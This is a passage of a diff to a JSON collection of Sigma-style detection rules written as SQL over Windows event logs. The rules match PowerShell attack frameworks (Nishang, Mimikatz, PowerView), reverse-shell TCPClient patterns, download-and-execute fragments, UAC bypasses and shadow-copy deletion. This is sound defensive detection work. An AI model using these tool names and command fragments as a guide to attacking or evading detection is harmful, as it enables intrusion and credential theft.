ScriptBlockText LIKE '%Invoke-WmiCommand%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-WMIExec%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-WScriptBypassUAC%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-Zerologon%' ESCAPE '\\' OR ScriptBlockText LIKE '%MailRaider%' ESCAPE '\\' OR ScriptBlockText LIKE '%New-HoneyHash%' ESCAPE '\\' OR ScriptBlockText LIKE '%New-InMemoryModule%' ESCAPE '\\' OR ScriptBlockText LIKE '%Out-Minidump%' ESCAPE '\\' OR ScriptBlockText LIKE '%Port-Scan%' ESCAPE '\\' OR ScriptBlockText LIKE '%PowerBreach%' ESCAPE '\\' OR ScriptBlockText LIKE '%powercat %' ESCAPE '\\' OR ScriptBlockText LIKE '%PowerUp%' ESCAPE '\\' OR ScriptBlockText LIKE '%PowerView%' ESCAPE '\\' OR ScriptBlockText LIKE '%Remove-Update%' ESCAPE '\\' OR ScriptBlockText LIKE '%Set-MacAttribute%' ESCAPE '\\' OR ScriptBlockText LIKE '%Set-Wallpaper%' ESCAPE '\\' OR ScriptBlockText LIKE '%Show-TargetScreen%' ESCAPE '\\' OR ScriptBlockText LIKE '%Start-CaptureServer%' ESCAPE '\\' OR ScriptBlockText LIKE '%Start-WebcamRecorder%' ESCAPE '\\' OR ScriptBlockText LIKE '%VolumeShadowCopyTools%' ESCAPE '\\') AND NOT (((ScriptBlockText LIKE '%Get-SystemDriveInfo%' ESCAPE '\\' OR ScriptBlockText LIKE '%C:\\\\ProgramData\\\\Amazon\\\\EC2-Windows\\\\Launch\\\\Module\\\\%' ESCAPE '\\')) OR (ScriptBlockText LIKE '# Copyright 2016 Amazon.com, Inc. or its affiliates. All Rights Reserved%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (OriginalFileName IN ('PowerShell.EXE', 'pwsh.dll') OR (NewProcessName LIKE '%\\\\powershell.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\pwsh.exe' ESCAPE '\\')) AND (CommandLine LIKE '% Net.Sockets.TCPClient%' ESCAPE '\\' AND CommandLine LIKE '%.GetStream(%' ESCAPE '\\' AND CommandLine LIKE '%.Write(%' ESCAPE '\\'))" ], - "filename": "posh_ps_malicious_commandlets.yml" + "filename": "proc_creation_win_powershell_reverse_shell_connection.yml" }, { - "title": "Request A Single Ticket via PowerShell", - "id": "a861d835-af37-4930-bcd6-5b178bfb54df", - "status": "test", - "description": "utilize native PowerShell Identity modules to query the domain to extract the Service Principal Names for a single computer.\nThis behavior is typically used during a kerberos or silver ticket attack.\nA successful execution will output the SPNs for the endpoint in question.\n", - "author": "frack113", + "title": "Fsutil Suspicious Invocation", + "id": "add64136-62e5-48ea-807e-88638d02df1e", + "status": "stable", + "description": "Detects suspicious parameters of fsutil (deleting USN journal, configuring it with small size, etc).\nMight be used by ransomwares during the attack (seen by NotPetya and others).\n", + "author": "Ecco, E.M. Anhaus, oscd.community", "tags": [ - "attack.credential_access", - "attack.t1558.003" + "attack.defense_evasion", + "attack.t1070" ], "falsepositives": [ - "Unknown" + "Admin activity", + "Scripts and administrative tools used in the monitored environment" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND ScriptBlockText LIKE '%System.IdentityModel.Tokens.KerberosRequestorSecurityToken%' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\fsutil.exe' ESCAPE '\\' OR OriginalFileName = 'fsutil.exe') AND (CommandLine LIKE '%deletejournal%' ESCAPE '\\' OR CommandLine LIKE '%createjournal%' ESCAPE '\\'))" ], - "filename": "posh_ps_request_kerberos_ticket.yml" + "filename": "proc_creation_win_fsutil_usage.yml" }, { - "title": "Potential Invoke-Mimikatz PowerShell Script", - "id": "189e3b02-82b2-4b90-9662-411eb64486d4", - "status": "experimental", - "description": "Detects Invoke-Mimikatz PowerShell script and alike. Mimikatz is a credential dumper capable of obtaining plaintext Windows account logins and passwords.", - "author": "Tim Rauch", + "title": "Blue Mockingbird", + "id": "c3198a27-23a0-4c2c-af19-e5328d49680e", + "status": "test", + "description": "Attempts to detect system changes made by Blue Mockingbird", + "author": "Trent Liffick (@tliffick)", "tags": [ - "attack.credential_access", - "attack.t1003" + "attack.execution", + "attack.t1112", + "attack.t1047" ], "falsepositives": [ - "Mimikatz can be useful for testing the security of networks" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational')) AND ((ScriptBlockText LIKE '%DumpCreds%' ESCAPE '\\' AND ScriptBlockText LIKE '%DumpCerts%' ESCAPE '\\') OR ScriptBlockText LIKE '%sekurlsa::logonpasswords%' ESCAPE '\\' OR (ScriptBlockText LIKE '%crypto::certificates%' ESCAPE '\\' AND ScriptBlockText LIKE '%CERT\\_SYSTEM\\_STORE\\_LOCAL\\_MACHINE%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((NewProcessName LIKE '%\\\\cmd.exe' ESCAPE '\\' AND CommandLine LIKE '%sc config%' ESCAPE '\\' AND CommandLine LIKE '%wercplsupporte.dll%' ESCAPE '\\') OR (NewProcessName LIKE '%\\\\wmic.exe' ESCAPE '\\' AND CommandLine LIKE '%COR\\_PROFILER' ESCAPE '\\')))" ], - "filename": "posh_ps_potential_invoke_mimikatz.yml" + "filename": "proc_creation_win_malware_blue_mockingbird.yml" }, { - "title": "Invoke-Obfuscation CLIP+ Launcher - PowerShell", - "id": "73e67340-0d25-11eb-adc1-0242ac120002", + "title": "Dllhost.EXE Execution Anomaly", + "id": "e7888eb1-13b0-4616-bd99-4bc0c2b054b9", "status": "experimental", - "description": "Detects Obfuscated use of Clip.exe to execute PowerShell", - "author": "Jonathan Cheong, oscd.community", + "description": "Detects a \"dllhost\" process spawning with no commandline arguments which is very rare to happen and could indicate process injection activity or malware mimicking similar system processes.", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ "attack.defense_evasion", - "attack.t1027", - "attack.execution", - "attack.t1059.001" + "attack.t1055" ], "falsepositives": [ - "Unknown" + "Unlikely" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND ScriptBlockText REGEXP '.*cmd.{0,5}(?:/c|/r).+clip(?:\\.exe)?.{0,4}&&.+clipboard]::\\(\\s\\\\\"\\{\\d\\}.+-f.+\"')" + "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND CommandLine LIKE '%dllhost.exe' ESCAPE '\\' AND NewProcessName LIKE '%\\\\dllhost.exe' ESCAPE '\\')" ], - "filename": "posh_ps_invoke_obfuscation_clip.yml" + "filename": "proc_creation_win_dllhost_no_cli_execution.yml" }, { - "title": "Suspicious PowerShell Keywords", - "id": "1f49f2ab-26bc-48b3-96cc-dcffbc93eadf", - "status": "test", - "description": "Detects keywords that could indicate the use of some PowerShell exploitation framework", - "author": "Florian Roth (Nextron Systems), Perez Diego (@darkquassar)", + "title": "HackTool - SharPersist Execution", + "id": "26488ad0-f9fd-4536-876f-52fea846a2e4", + "status": "experimental", + "description": "Detects the execution of the hacktool SharPersist - used to deploy various different kinds of persistence mechanisms", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.execution", - "attack.t1059.001" + "attack.persistence", + "attack.t1053" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND (ScriptBlockText LIKE '%System.Reflection.Assembly.Load($%' ESCAPE '\\' OR ScriptBlockText LIKE '%[System.Reflection.Assembly]::Load($%' ESCAPE '\\' OR ScriptBlockText LIKE '%[Reflection.Assembly]::Load($%' ESCAPE '\\' OR ScriptBlockText LIKE '%System.Reflection.AssemblyName%' ESCAPE '\\' OR ScriptBlockText LIKE '%Reflection.Emit.AssemblyBuilderAccess%' ESCAPE '\\' OR ScriptBlockText LIKE '%Runtime.InteropServices.DllImportAttribute%' ESCAPE '\\' OR ScriptBlockText LIKE '%SuspendThread%' ESCAPE '\\' OR ScriptBlockText LIKE '%rundll32%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((NewProcessName LIKE '%\\\\SharPersist.exe' ESCAPE '\\' OR Product = 'SharPersist') OR (CommandLine LIKE '% -t schtask -c %' ESCAPE '\\' OR CommandLine LIKE '% -t startupfolder -c %' ESCAPE '\\') OR (CommandLine LIKE '% -t reg -c %' ESCAPE '\\' AND CommandLine LIKE '% -m add%' ESCAPE '\\') OR (CommandLine LIKE '% -t service -c %' ESCAPE '\\' AND CommandLine LIKE '% -m add%' ESCAPE '\\') OR (CommandLine LIKE '% -t schtask -c %' ESCAPE '\\' AND CommandLine LIKE '% -m add%' ESCAPE '\\')))" ], - "filename": "posh_ps_susp_keywords.yml" + "filename": "proc_creation_win_hktl_sharpersist.yml" }, { - "title": "PowerShell PSAttack", - "id": "b7ec41a4-042c-4f31-a5db-d0fcde9fa5c5", + "title": "Suspicious PowerShell Parent Process", + "id": "754ed792-634f-40ae-b3bc-e0448d33f695", "status": "test", - "description": "Detects the use of PSAttack PowerShell hack tool", - "author": "Sean Metcalf (source), Florian Roth (Nextron Systems)", + "description": "Detects a suspicious or uncommon parent processes of PowerShell", + "author": "Teymur Kheirkhabarov, Harish Segar", "tags": [ "attack.execution", "attack.t1059.001" ], "falsepositives": [ - "Unknown" + "Other scripts" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND ScriptBlockText LIKE '%PS ATTACK!!!%' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (ParentProcessName LIKE '%tomcat%' ESCAPE '\\' OR (ParentProcessName LIKE '%\\\\amigo.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\browser.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\chrome.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\firefox.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\httpd.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\iexplore.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\jbosssvc.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\microsoftedge.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\microsoftedgecp.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\MicrosoftEdgeSH.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\mshta.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\nginx.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\outlook.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\php-cgi.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\regsvr32.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\rundll32.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\safari.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\services.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\sqlagent.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\sqlserver.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\sqlservr.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\vivaldi.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\w3wp.exe' ESCAPE '\\')) AND ((NewProcessName LIKE '%\\\\powershell.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\pwsh.exe' ESCAPE '\\') OR (CommandLine LIKE '%/c powershell%' ESCAPE '\\' OR CommandLine LIKE '%/c pwsh%' ESCAPE '\\') OR Description = 'Windows PowerShell' OR Product = 'PowerShell Core 6' OR OriginalFileName IN ('PowerShell.EXE', 'pwsh.dll')))" ], - "filename": "posh_ps_psattack.yml" + "filename": "proc_creation_win_powershell_susp_parent_process.yml" }, { - "title": "Malicious Nishang PowerShell Commandlets", - "id": "f772cee9-b7c2-4cb2-8f07-49870adc02e0", - "status": "experimental", - "description": "Detects Commandlet names and arguments from the Nishang exploitation framework", - "author": "Alec Costello", + "title": "TrustedPath UAC Bypass Pattern", + "id": "4ac47ed3-44c2-4b1f-9d51-bf46e8914126", + "status": "test", + "description": "Detects indicators of a UAC bypass method by mocking directories", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.execution", - "attack.t1059.001" + "attack.defense_evasion", + "attack.t1548.002" ], "falsepositives": [ "Unknown" ], - "level": "high", + "level": "critical", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND (ScriptBlockText LIKE '%Add-ConstrainedDelegationBackdoor%' ESCAPE '\\' OR ScriptBlockText LIKE '%Copy-VSS%' ESCAPE '\\' OR ScriptBlockText LIKE '%Create-MultipleSessions%' ESCAPE '\\' OR ScriptBlockText LIKE '%DataToEncode%' ESCAPE '\\' OR ScriptBlockText LIKE '%DNS\\_TXT\\_Pwnage%' ESCAPE '\\' OR ScriptBlockText LIKE '%Do-Exfiltration-Dns%' ESCAPE '\\' OR ScriptBlockText LIKE '%Download\\_Execute%' ESCAPE '\\' OR ScriptBlockText LIKE '%Download-Execute-PS%' ESCAPE '\\' OR ScriptBlockText LIKE '%DownloadAndExtractFromRemoteRegistry%' ESCAPE '\\' OR ScriptBlockText LIKE '%DumpCerts%' ESCAPE '\\' OR ScriptBlockText LIKE '%DumpCreds%' ESCAPE '\\' OR ScriptBlockText LIKE '%DumpHashes%' ESCAPE '\\' OR ScriptBlockText LIKE '%Enable-DuplicateToken%' ESCAPE '\\' OR ScriptBlockText LIKE '%Enable-Duplication%' ESCAPE '\\' OR ScriptBlockText LIKE '%Execute-Command-MSSQL%' ESCAPE '\\' OR ScriptBlockText LIKE '%Execute-DNSTXT-Code%' ESCAPE '\\' OR ScriptBlockText LIKE '%Execute-OnTime%' ESCAPE '\\' OR ScriptBlockText LIKE '%ExetoText%' ESCAPE '\\' OR ScriptBlockText LIKE '%exfill%' ESCAPE '\\' OR ScriptBlockText LIKE '%ExfilOption%' ESCAPE '\\' OR ScriptBlockText LIKE '%FakeDC%' ESCAPE '\\' OR ScriptBlockText LIKE '%FireBuster%' ESCAPE '\\' OR ScriptBlockText LIKE '%FireListener%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-Information %' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-PassHints%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-Web-Credentials%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-WebCredentials%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-WLAN-Keys%' ESCAPE '\\' OR ScriptBlockText LIKE '%HTTP-Backdoor%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-AmsiBypass%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-BruteForce%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-CredentialsPhish%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-Decode%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-Encode%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-Interceptor%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-JSRatRegsvr%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-JSRatRundll%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-MimikatzWDigestDowngrade%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-NetworkRelay%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-PowerShellIcmp%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-PowerShellUdp%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-Prasadhak%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-PSGcat%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-PsGcatAgent%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-SessionGopher%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-SSIDExfil%' ESCAPE '\\' OR ScriptBlockText LIKE '%LoggedKeys%' ESCAPE '\\' OR ScriptBlockText LIKE '%Nishang%' ESCAPE '\\' OR ScriptBlockText LIKE '%NotAllNameSpaces%' ESCAPE '\\' OR ScriptBlockText LIKE '%Out-CHM%' ESCAPE '\\' OR ScriptBlockText LIKE '%OUT-DNSTXT%' ESCAPE '\\' OR ScriptBlockText LIKE '%Out-HTA%' ESCAPE '\\' OR ScriptBlockText LIKE '%Out-RundllCommand%' ESCAPE '\\' OR ScriptBlockText LIKE '%Out-SCF%' ESCAPE '\\' OR ScriptBlockText LIKE '%Out-SCT%' ESCAPE '\\' OR ScriptBlockText LIKE '%Out-Shortcut%' ESCAPE '\\' OR ScriptBlockText LIKE '%Out-WebQuery%' ESCAPE '\\' OR ScriptBlockText LIKE '%Out-Word%' ESCAPE '\\' OR ScriptBlockText LIKE '%Parse\\_Keys%' ESCAPE '\\' OR ScriptBlockText LIKE '%Password-List%' ESCAPE '\\' OR ScriptBlockText LIKE '%Powerpreter%' ESCAPE '\\' OR ScriptBlockText LIKE '%Remove-Persistence%' ESCAPE '\\' OR ScriptBlockText LIKE '%Remove-PoshRat%' ESCAPE '\\' OR ScriptBlockText LIKE '%Remove-Update%' ESCAPE '\\' OR ScriptBlockText LIKE '%Run-EXEonRemote%' ESCAPE '\\' OR ScriptBlockText LIKE '%Set-DCShadowPermissions%' ESCAPE '\\' OR ScriptBlockText LIKE '%Set-RemotePSRemoting%' ESCAPE '\\' OR ScriptBlockText LIKE '%Set-RemoteWMI%' ESCAPE '\\' OR ScriptBlockText LIKE '%Shellcode32%' ESCAPE '\\' OR ScriptBlockText LIKE '%Shellcode64%' ESCAPE '\\' OR ScriptBlockText LIKE '%StringtoBase64%' ESCAPE '\\' OR ScriptBlockText LIKE '%TexttoExe%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND NewProcessName LIKE '%C:\\\\Windows \\\\System32\\\\%' ESCAPE '\\')" ], - "filename": "posh_ps_nishang_malicious_commandlets.yml" + "filename": "proc_creation_win_uac_bypass_trustedpath.yml" }, { - "title": "Live Memory Dump Using Powershell", - "id": "cd185561-4760-45d6-a63e-a51325112cae", + "title": "OpenWith.exe Executes Specified Binary", + "id": "cec8e918-30f7-4e2d-9bfa-a59cc97ae60f", "status": "test", - "description": "Detects usage of a PowerShell command to dump the live memory of a Windows machine", - "author": "Max Altgelt (Nextron Systems)", + "description": "The OpenWith.exe executes other binary", + "author": "Beyu Denis, oscd.community (rule), @harr0ey (idea)", "tags": [ - "attack.t1003" + "attack.defense_evasion", + "attack.t1218" ], "falsepositives": [ - "Diagnostics" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND ScriptBlockText LIKE '%Get-StorageDiagnosticInfo%' ESCAPE '\\' AND ScriptBlockText LIKE '%-IncludeLiveDump%' ESCAPE '\\')" + "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND NewProcessName LIKE '%\\\\OpenWith.exe' ESCAPE '\\' AND CommandLine LIKE '%/c%' ESCAPE '\\')" ], - "filename": "posh_ps_memorydump_getstoragediagnosticinfo.yml" + "filename": "proc_creation_win_lolbin_openwith.yml" }, { - "title": "WMImplant Hack Tool", - "id": "8028c2c3-e25a-46e3-827f-bbb5abf181d7", + "title": "UAC Bypass Using Disk Cleanup", + "id": "b697e69c-746f-4a86-9f59-7bfff8eab881", "status": "test", - "description": "Detects parameters used by WMImplant", - "author": "NVISO", - "tags": [ - "attack.execution", - "attack.t1047", - "attack.t1059.001" - ], - "falsepositives": [ - "Administrative scripts that use the same keywords." - ], - "level": "high", - "rule": [ - "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND (ScriptBlockText LIKE '%WMImplant%' ESCAPE '\\' OR ScriptBlockText LIKE '% change\\_user %' ESCAPE '\\' OR ScriptBlockText LIKE '% gen\\_cli %' ESCAPE '\\' OR ScriptBlockText LIKE '% command\\_exec %' ESCAPE '\\' OR ScriptBlockText LIKE '% disable\\_wdigest %' ESCAPE '\\' OR ScriptBlockText LIKE '% disable\\_winrm %' ESCAPE '\\' OR ScriptBlockText LIKE '% enable\\_wdigest %' ESCAPE '\\' OR ScriptBlockText LIKE '% enable\\_winrm %' ESCAPE '\\' OR ScriptBlockText LIKE '% registry\\_mod %' ESCAPE '\\' OR ScriptBlockText LIKE '% remote\\_posh %' ESCAPE '\\' OR ScriptBlockText LIKE '% sched\\_job %' ESCAPE '\\' OR ScriptBlockText LIKE '% service\\_mod %' ESCAPE '\\' OR ScriptBlockText LIKE '% process\\_kill %' ESCAPE '\\' OR ScriptBlockText LIKE '% active\\_users %' ESCAPE '\\' OR ScriptBlockText LIKE '% basic\\_info %' ESCAPE '\\' OR ScriptBlockText LIKE '% power\\_off %' ESCAPE '\\' OR ScriptBlockText LIKE '% vacant\\_system %' ESCAPE '\\' OR ScriptBlockText LIKE '% logon\\_events %' ESCAPE '\\'))" - ], - "filename": "posh_ps_wmimplant.yml" - }, - { - "title": "Disable-WindowsOptionalFeature Command PowerShell", - "id": "99c4658d-2c5e-4d87-828d-7c066ca537c3", - "status": "experimental", - "description": "Detect built in PowerShell cmdlet Disable-WindowsOptionalFeature, Deployment Image Servicing and Management tool.\nSimilar to DISM.exe, this cmdlet is used to enumerate, install, uninstall, configure, and update features and packages in Windows images\n", - "author": "frack113", + "description": "Detects the pattern of UAC Bypass using scheduled tasks and variable expansion of cleanmgr.exe (UACMe 34)", + "author": "Christian Burkard (Nextron Systems)", "tags": [ "attack.defense_evasion", - "attack.t1562.001" + "attack.privilege_escalation", + "attack.t1548.002" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND ScriptBlockText LIKE '%Disable-WindowsOptionalFeature%' ESCAPE '\\' AND ScriptBlockText LIKE '%-Online%' ESCAPE '\\' AND ScriptBlockText LIKE '%-FeatureName%' ESCAPE '\\' AND (ScriptBlockText LIKE '%Windows-Defender-Gui%' ESCAPE '\\' OR ScriptBlockText LIKE '%Windows-Defender-Features%' ESCAPE '\\' OR ScriptBlockText LIKE '%Windows-Defender%' ESCAPE '\\' OR ScriptBlockText LIKE '%Windows-Defender-ApplicationGuard%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND CommandLine LIKE '%\"\\\\system32\\\\cleanmgr.exe /autoclean /d C:' ESCAPE '\\' AND ParentCommandLine LIKE 'C:\\\\Windows\\\\system32\\\\svchost.exe -k netsvcs -p -s Schedule' ESCAPE '\\' AND IntegrityLevel IN ('High', 'System'))" ], - "filename": "posh_ps_disable_windows_optional_feature.yml" + "filename": "proc_creation_win_uac_bypass_cleanmgr.yml" }, { - "title": "Delete Volume Shadow Copies via WMI with PowerShell - PS Script", - "id": "e17121b4-ef2a-4418-8a59-12fb1631fa9e", - "status": "test", - "description": "Deletes Windows Volume Shadow Copies with PowerShell code and Get-WMIObject. This technique is used by numerous ransomware families such as Sodinokibi/REvil", - "author": "frack113", + "title": "Windows Update Client LOLBIN", + "id": "d7825193-b70a-48a4-b992-8b5b3015cc11", + "status": "experimental", + "description": "Detects code execution via the Windows Update client (wuauclt)", + "author": "FPT.EagleEye Team", "tags": [ - "attack.impact", - "attack.t1490" + "attack.command_and_control", + "attack.execution", + "attack.t1105", + "attack.t1218" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND ScriptBlockText LIKE '%Get-WmiObject%' ESCAPE '\\' AND ScriptBlockText LIKE '%Win32\\_Shadowcopy%' ESCAPE '\\' AND ScriptBlockText LIKE '%.Delete()%' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((NewProcessName LIKE '%\\\\wuauclt.exe' ESCAPE '\\' OR OriginalFileName = 'wuauclt.exe') AND (CommandLine LIKE '%/UpdateDeploymentProvider%' ESCAPE '\\' AND CommandLine LIKE '%/RunHandlerComServer%' ESCAPE '\\' AND CommandLine LIKE '%.dll%' ESCAPE '\\')) AND NOT ((CommandLine LIKE '% /ClassId %' ESCAPE '\\' OR CommandLine LIKE '% wuaueng.dll %' ESCAPE '\\')))" ], - "filename": "posh_ps_susp_win32_shadowcopy.yml" + "filename": "proc_creation_win_wuauclt_execution.yml" }, { - "title": "Suspicious PowerShell Invocations - Specific", - "id": "ae7fbf8e-f3cb-49fd-8db4-5f3bed522c71", - "status": "experimental", - "description": "Detects suspicious PowerShell invocation command parameters", - "author": "Florian Roth (Nextron Systems), Jonhnathan Ribeiro", + "title": "Suspicious HH.EXE Execution", + "id": "e8a95b5e-c891-46e2-b33a-93937d3abc31", + "status": "test", + "description": "Detects a suspicious execution of a Microsoft HTML Help (HH.exe)", + "author": "Maxim Pavlunin", "tags": [ + "attack.defense_evasion", "attack.execution", - "attack.t1059.001" + "attack.initial_access", + "attack.t1047", + "attack.t1059.001", + "attack.t1059.003", + "attack.t1059.005", + "attack.t1059.007", + "attack.t1218", + "attack.t1218.001", + "attack.t1218.010", + "attack.t1218.011", + "attack.t1566", + "attack.t1566.001" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational')) AND ((ScriptBlockText LIKE '%-nop%' ESCAPE '\\' AND ScriptBlockText LIKE '% -w %' ESCAPE '\\' AND ScriptBlockText LIKE '%hidden%' ESCAPE '\\' AND ScriptBlockText LIKE '% -c %' ESCAPE '\\' AND ScriptBlockText LIKE '%[Convert]::FromBase64String%' ESCAPE '\\') OR (ScriptBlockText LIKE '% -w %' ESCAPE '\\' AND ScriptBlockText LIKE '%hidden%' ESCAPE '\\' AND ScriptBlockText LIKE '%-noni%' ESCAPE '\\' AND ScriptBlockText LIKE '%-nop%' ESCAPE '\\' AND ScriptBlockText LIKE '% -c %' ESCAPE '\\' AND ScriptBlockText LIKE '%iex%' ESCAPE '\\' AND ScriptBlockText LIKE '%New-Object%' ESCAPE '\\') OR (ScriptBlockText LIKE '% -w %' ESCAPE '\\' AND ScriptBlockText LIKE '%hidden%' ESCAPE '\\' AND ScriptBlockText LIKE '%-ep%' ESCAPE '\\' AND ScriptBlockText LIKE '%bypass%' ESCAPE '\\' AND ScriptBlockText LIKE '%-Enc%' ESCAPE '\\') OR (ScriptBlockText LIKE '%powershell%' ESCAPE '\\' AND ScriptBlockText LIKE '%reg%' ESCAPE '\\' AND ScriptBlockText LIKE '%add%' ESCAPE '\\' AND ScriptBlockText LIKE '%HKCU\\\\software\\\\microsoft\\\\windows\\\\currentversion\\\\run%' ESCAPE '\\') OR (ScriptBlockText LIKE '%bypass%' ESCAPE '\\' AND ScriptBlockText LIKE '%-noprofile%' ESCAPE '\\' AND ScriptBlockText LIKE '%-windowstyle%' ESCAPE '\\' AND ScriptBlockText LIKE '%hidden%' ESCAPE '\\' AND ScriptBlockText LIKE '%new-object%' ESCAPE '\\' AND ScriptBlockText LIKE '%system.net.webclient%' ESCAPE '\\' AND ScriptBlockText LIKE '%.download%' ESCAPE '\\') OR (ScriptBlockText LIKE '%iex%' ESCAPE '\\' AND ScriptBlockText LIKE '%New-Object%' ESCAPE '\\' AND ScriptBlockText LIKE '%Net.WebClient%' ESCAPE '\\' AND ScriptBlockText LIKE '%.Download%' ESCAPE '\\')) AND NOT (((ScriptBlockText LIKE '%(New-Object System.Net.WebClient).DownloadString(''https://community.chocolatey.org/install.ps1%' ESCAPE '\\' OR ScriptBlockText LIKE '%(New-Object System.Net.WebClient).DownloadString(''https://chocolatey.org/install.ps1'')%' ESCAPE '\\' OR ScriptBlockText LIKE '%Write-ChocolateyWarning%' ESCAPE '\\'))))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (OriginalFileName = 'HH.exe' OR NewProcessName LIKE '%\\\\hh.exe' ESCAPE '\\') AND (CommandLine LIKE '%.application%' ESCAPE '\\' OR CommandLine LIKE '%\\\\AppData\\\\Local\\\\Temp\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Content.Outlook\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Downloads\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Users\\\\Public\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Windows\\\\Temp\\\\%' ESCAPE '\\'))" ], - "filename": "posh_ps_susp_invocation_specific.yml" + "filename": "proc_creation_win_hh_susp_execution.yml" }, { - "title": "NTFS Alternate Data Stream", - "id": "8c521530-5169-495d-a199-0a3a881ad24e", + "title": "UAC Bypass Using IEInstal - Process", + "id": 